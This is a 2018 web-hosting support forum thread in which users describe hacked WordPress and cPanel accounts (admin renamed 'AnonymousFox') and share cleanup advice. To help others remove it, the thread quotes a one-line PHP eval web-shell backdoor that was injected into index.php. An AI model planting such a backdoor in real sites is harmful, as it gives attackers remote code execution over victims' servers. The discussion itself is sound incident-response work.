hdkw1996 Posted July 21, 2018 Posted July 21, 2018 Suddenly i cant log in to my account on username hdkw1996,It shows as invalid login, then i tried to reset the password and log in again but it didnt work at all.please help me.... My databases are on the server..
danval Posted July 21, 2018 Posted July 21, 2018 Hi, The same thing was start happening to me yersteday. I have a Wordpress site on Tommy and I couldn't login either cPanel or Wordpress administration. After reset my password, I could login to cPanel. I checked Wordpress database and I discovered that the admin user login was renamed and password changed. These changes were not made from me, so I think the site was been hacked (and so my cPanel account). I though this was only my problem, but a family member who has a Wordpress blog on HelioHost too, suffered the same problem. The Wordpress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it. Seemingly the attack only affects to the passwords, not files and the database is in good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good. Anyone has the same problem? Best Regards,
dream11 Posted July 21, 2018 Posted July 21, 2018 (edited) same problem there, tried to open the cpanel, no luck,i know the pass was correct so i didn't reset it,few minutes later, i can't even try to login, and none of my websties loads, problem was the server blocking my ip for try too much,now i reseted the cpanel password, and i can't login to WP, they also reseted the wordpress login, to username was changed to "AnonymousFox"what a shame, you have a shop and they can reset the paypal account to get the payments, and download all your clients data,so what if you reset it back? they can still make it happen again if the bug is not patched Edited July 21, 2018 by dream11
danval Posted July 21, 2018 Posted July 21, 2018 Yes, the 'AnonymousFox' was the same administrator user rename as mine. I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made. I have done and scan from Wordfence, and I have the Wordpress installation modified: New file: wp-admin/2125719357.phpNew file: wp-content/1205929475.phpNew file: wp-admin/php.iniModified file: index.php
dream11 Posted July 21, 2018 Posted July 21, 2018 (edited) and what are the changes made at php.ini and index.php ? i can delete the other files, but dont know what changed were made on the ini and php, the other two new fles, one is a password protected php mailer, and the other one is crypted shell access, this has been clearly made for phishing,Yes, the 'AnonymousFox' was the same administrator user rename as mine. I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made. I have done and scan from Wordfence, and I have the Wordpress installation modified: New file: wp-admin/2125719357.phpNew file: wp-content/1205929475.phpNew file: wp-admin/php.iniModified file: index.php Edited July 21, 2018 by dream11
danval Posted July 21, 2018 Posted July 21, 2018 In "index.php", remove this code at the start of file: <?php eval($_POST['475454656']); ?> The "php.ini" must be deleted because not belongs to Wordpress. I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one. Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole... .
dream11 Posted July 21, 2018 Posted July 21, 2018 thanks,to you looks like a wordpress hack or a server hack?the fact they changed the cpanel scared me a bit, since they have access to do anything In "index.php", remove this code at the start of file: <?php eval($_POST['475454656']); ?> The "php.ini" must be deleted because not belongs to Wordpress. I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one. Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole... .
dream11 Posted July 21, 2018 Posted July 21, 2018 (edited) done,sadly, i dont have backups as far as i remember Edited July 21, 2018 by dream11
usr8481 Posted July 21, 2018 Posted July 21, 2018 (edited) and my ip was blocked... I restored heliohost account password but I have to wait until someone unblock my ip Edited July 21, 2018 by usr8481
usr8481 Posted July 21, 2018 Posted July 21, 2018 (edited) screenshot Edited July 21, 2018 by usr8481
wolstech Posted July 21, 2018 Posted July 21, 2018 Wordpress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because it's extensions are usually also full of holes. We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at heliohost. Finding another CMS is your best option. If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backwoods) and make sure you keep it updated going forward, Otherwise this issue is just going to come back. Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account).
usr8481 Posted July 21, 2018 Posted July 21, 2018 Wordpress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because it's extensions are usually also full of holes. We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at heliohost. Finding another CMS is your best option. If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backwoods) and make sure you keep it updated going forward, Otherwise this issue is just going to come back. Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account). unblock ip please - https://www.helionet.org/index/topic/33546-unblock-ip/
dream11 Posted July 21, 2018 Posted July 21, 2018 i am out the server again, that sucks, i have my wordpress up to date, must be a plugin? argh
dream11 Posted July 21, 2018 Posted July 21, 2018 he is even playing with my wp! he changed the slogan, OMG...
Recommended Posts